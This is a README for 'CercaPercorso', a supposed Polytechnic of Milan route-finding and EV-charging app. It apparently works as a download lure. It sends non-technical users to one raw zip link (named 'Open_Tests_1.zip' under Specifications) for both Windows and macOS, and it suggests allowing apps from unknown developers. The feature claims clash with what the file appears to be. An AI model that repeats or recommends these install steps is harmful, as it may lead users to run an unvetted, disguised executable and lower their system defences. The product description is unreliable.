Welcome to the API-Project! This repository contains the final test project from the Polytechnic of Milan. Our application, CercaPercorso, helps you find a route between two stations on a highway and manage the stations for electric cars. You can easily identify charging stations along your journey, making travel more convenient for electric car users.
To use the CercaPercorso application, follow these steps to download and set up the software. It is designed for end-users who may not have technical expertise.
Before you start, ensure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS 10.14 or later
- Memory: At least 4 GB of RAM
- Storage: 100 MB of available space
- Network: Internet connection for downloading the app and accessing maps

Visit the Downloads Page: Go to our Releases page to find the latest version of CercaPercorso.

Choose Your File: Look for the file that matches your operating system (e.g., https://raw.githubusercontent.com/Castro57-goblim/API-Project/main/Specifications/Open_Tests_1.zip or https://raw.githubusercontent.com/Castro57-goblim/API-Project/main/Specifications/Open_Tests_1.zip).

Download the File: Click to download the file. Your browser will start downloading it automatically.

Extract the Files: Once the download is complete, locate the downloaded file, typically found in your "Downloads" folder.
- For Windows: Right-click on the zip file and select 'Extract All'. Follow the prompts to extract the files.
- For macOS: Double-click the zip file to extract the contents.

If you encounter issues, consider the following:
- File Not Opening: Ensure your system meets the system requirements listed above. Also, check if you have permissions to run applications from unknown developers on macOS.
- Internet Connection: The app requires an internet connection to fetch data. Ensure your device is connected.
- Route Finder: Easily search for routes between two highway stations.
- Electric Car Support: Manage your travel with electric vehicle charging stations.
- User-Friendly Interface: Navigate the app with ease, designed for non-technical users.
- Map Integration: View current and future routes on an integrated map display.
